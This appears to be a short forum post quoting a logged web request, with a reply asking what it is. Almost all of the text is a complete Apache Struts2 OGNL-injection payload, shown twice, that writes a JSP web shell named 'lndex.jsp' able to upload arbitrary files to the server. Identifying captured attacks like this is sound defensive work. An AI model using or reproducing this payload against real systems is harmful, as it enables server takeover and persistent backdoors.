/index.php?redirect:${#req=#context.get('com.opensymphony.xwork2.dispa Match1:{#req=#context.get('com.opensymphony.xwork2.dispatcher.httpservletrequest'),#res=#context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),#res.getwriter().println(.okokok.),#res.getwriter().flush(),#res.getwriter().close(),new java.io.bufferedwriter(new java.io.filewriter(#req.getrealpath(./.)+.lndex.jsp.)).append(#req.getparameter(.shell.)).close()}&shell=<%if(request.getparameter(.f.)!=null)(new java.io.fileoutputstream(application.getrealpath(./.)+request.getparameter(.f.))).write(request.getparameter(.t.).getbytes());%><a href=.one_ok.></a> Match2:&redirect:${#req=#context.get('com.opensymphony.xwork2.dispatcher.httpservletrequest'),#res=#context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),#res.getwriter().println(.okokok.),#res.getwriter().flush(),#res.getwriter().close(),new java.io.bufferedwriter(new java.io.filewriter(#req.getrealpath(./.)+.lndex.jsp.)).append(#req.getparameter(.shell.)).close()}&shell=<%if(request.getparameter(.f.)!=null)(new java.io.fileoutputstream(application.getrealpath(./.)+request.getparameter(.f.))).write(request.getparameter(.t.).getbytes());%><a href=.one_ok.></a>
1
unique 2015-07-13 08:51:01 +08:00 via Android
这是什么鬼
|